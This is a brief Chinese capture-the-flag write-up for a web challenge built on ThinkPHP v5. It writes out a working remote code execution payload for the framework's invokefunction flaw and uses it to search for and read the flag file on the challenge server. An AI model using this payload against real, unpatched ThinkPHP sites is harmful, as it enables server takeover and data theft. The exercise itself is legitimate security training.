题目中出现thinkPHPv5 百度一下,会发现这个框架出现webshell漏洞,可参考ThinkPHP V5.x 远程代码执行漏洞利用(附POC) | CN-SEC 中文网
https://adworld.xctf.org.cn/task/writeup?type=web&id=5412&number=3&grade=1&page=1
可以通过构建
?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作码
来得到shell;
所以此题构建payload http://111.200.241.244:58022/?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag*"
发现最后有/flag
再构建payload cat /flag 就可获得flag;